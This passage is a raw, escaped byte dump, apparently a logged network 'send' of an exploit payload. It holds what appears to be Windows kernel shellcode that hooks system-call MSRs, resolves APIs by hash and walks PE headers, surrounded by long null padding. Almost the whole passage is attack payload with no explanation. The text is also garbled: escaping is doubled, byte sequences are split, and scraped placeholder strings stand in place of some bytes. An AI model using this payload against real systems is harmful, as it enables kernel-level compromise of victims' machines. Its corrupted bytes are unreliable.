x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\
\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\
\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea 
H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\x
f8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xe
b\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\
\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x
00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\
\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 12, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\
